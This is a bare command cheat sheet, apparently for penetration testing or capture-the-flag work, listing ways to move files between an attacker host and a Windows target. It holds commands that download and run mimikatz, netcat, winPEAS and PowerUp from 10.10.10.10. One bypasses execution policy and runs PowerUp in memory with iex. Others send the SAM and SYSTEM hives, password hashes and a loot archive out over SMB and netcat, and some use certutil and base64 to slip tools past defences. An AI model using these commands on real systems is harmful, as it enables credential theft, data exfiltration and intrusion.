python3 -m http.server 80
powershell -c "iwr http://10.10.10.10/nc.exe -OutFile C:\Windows\Temp\nc.exe" powershell -c "iwr http://10.10.10.10/mimikatz.exe -OutFile mimikatz.exe" powershell -c "iwr http://10.10.10.10/winPEAS.exe -OutFile winPEAS.exe"
powershell -ep bypass -c "iex(iwr http://10.10.10.10/powerup.ps1 -UseBasicParsing)"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/nc.exe','nc.exe')" powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/mimikatz.exe','mimikatz.exe')"
certutil -urlcache -split -f http://10.10.10.10/nc.exe nc.exe certutil -urlcache -split -f http://10.10.10.10/mimikatz.exe mimikatz.exe certutil -urlcache -split -f http://10.10.10.10/winPEAS.exe winPEAS.exe
impacket-smbserver share . -smb2support
copy \\10.10.10.10\share\nc.exe nc.exe copy \\10.10.10.10\share\mimikatz.exe mimikatz.exe copy \\10.10.10.10\share\winPEAS.exe winPEAS.exe
New-PSDrive -Name p -PSProvider FileSystem -Root \\10.10.10.10\share copy p:\nc.exe . copy p:\mimikatz.exe .
copy SAM \\10.10.10.10\share\ copy SYSTEM \\10.10.10.10\share\ copy hashes.txt \\10.10.10.10\share\
python3 -m http.server 443
powershell -c "iwr https://10.10.10.10/nc.exe -OutFile nc.exe"
nc -lvnp 4444 < mimikatz.exe
nc 10.10.10.10 4444 > mimikatz.exe
nc -lvnp 4444 > loot.zip
nc 10.10.10.10 4444 < C:\Users\Public\loot.zip
base64 mimikatz.exe > mimikatz.b64
certutil -urlcache -f http://10.10.10.10/mimikatz.b64 mimikatz.b64 certutil -decode mimikatz.b64 mimikatz.exe